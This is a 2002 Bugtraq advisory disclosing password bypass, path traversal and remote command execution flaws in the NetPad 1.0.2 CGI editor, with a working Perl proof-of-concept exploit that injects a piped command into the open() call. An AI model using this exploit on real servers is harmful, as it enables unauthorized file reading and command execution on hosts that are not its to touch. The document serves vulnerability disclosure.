Bugtraq mailing list archives
LevCGI.coms NetPad 1.0.2 multiple vulnerabilities
From: "BrainRawt ." <brainrawt () hotmail com>
Date: Tue, 14 May 2002 01:44:28 +0000
Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities AdvisoryDiscovered By b0iler(b0iler () hotmail com) and BrainRawt(brainrawt () hotmail com)
About Netpad: ------------------ <quote from levcgi.com> Easy to install and use text editor for your web browser! This NotePad like program allows you to open your files and pages online in your browser and edit their contents through the browser without forcing you to re-upload your changes all the time! Extremely effecient and a must have tool for all webmasters! </quote from levcgi.com> According to the website, ...NetPad has been downloaded 1225 times! Vulnerable (tested) Versions: -------------------- NetPad v 1.0.2 Vendor Contact: ---------------- 4-28-02 - Emailed lev () taintedthoughts com Vulnerabilities: -- Password Bypass1. The website claims "password security feature to prevent unauthorized access!",
but this is NOT true.A password is not required to read files. It is only required to write to files.
-- Path Traversal2. Improper filtering of input allows one to enter the traditional "../../../" into the input field to crawl back through directories of the server hosting netpad.cgi,
allowing one to view any file readable by the webserver. -- Command Execution3. Due to improper usage of the open() function and input filtering, it is possible for a malicious visitor to remotely execute commands on the server hosting
netpad.cgi Proof of Concept code can be found below............ Remote Command Execution Exploit (POC): --------------------------------------- #!/usr/bin/perl # exploit for levcgi's NetPad 1.0.2 # # This could easily be done with any browser and alittle effort. # # requires LWP avaliable at # http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz # also, the number of ../'s differs. It depends on what $basedir # is set to in the netpad.cgi script ## usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi ../../../../bin/command
use LWP::UserAgent; $ua = new LWP::UserAgent; $ua->agent("your open call can be exploited" . $ua->agent); my $req = new HTTP::Request POST => $ARGV[0]; $req->content_type('application/x-www-form-urlencoded'); foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); } $req->content("proc=open&of=${of}|"); my $res = $ua->request($req);if ($res->is_success) { print $res->content . "\n\nit should have worked.\n"; }
else { print "request failed.\n"; } Fix: ------ No matter how well one filters input to this program, we recommend that the program itself be protected by htaccess. --------------------------------------------------------------------------Did you (Lev) say something about stupid people doing stupid things? - BrainRawt
_________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com
Current thread:
- LevCGI.coms NetPad 1.0.2 multiple vulnerabilities BrainRawt . (May 14)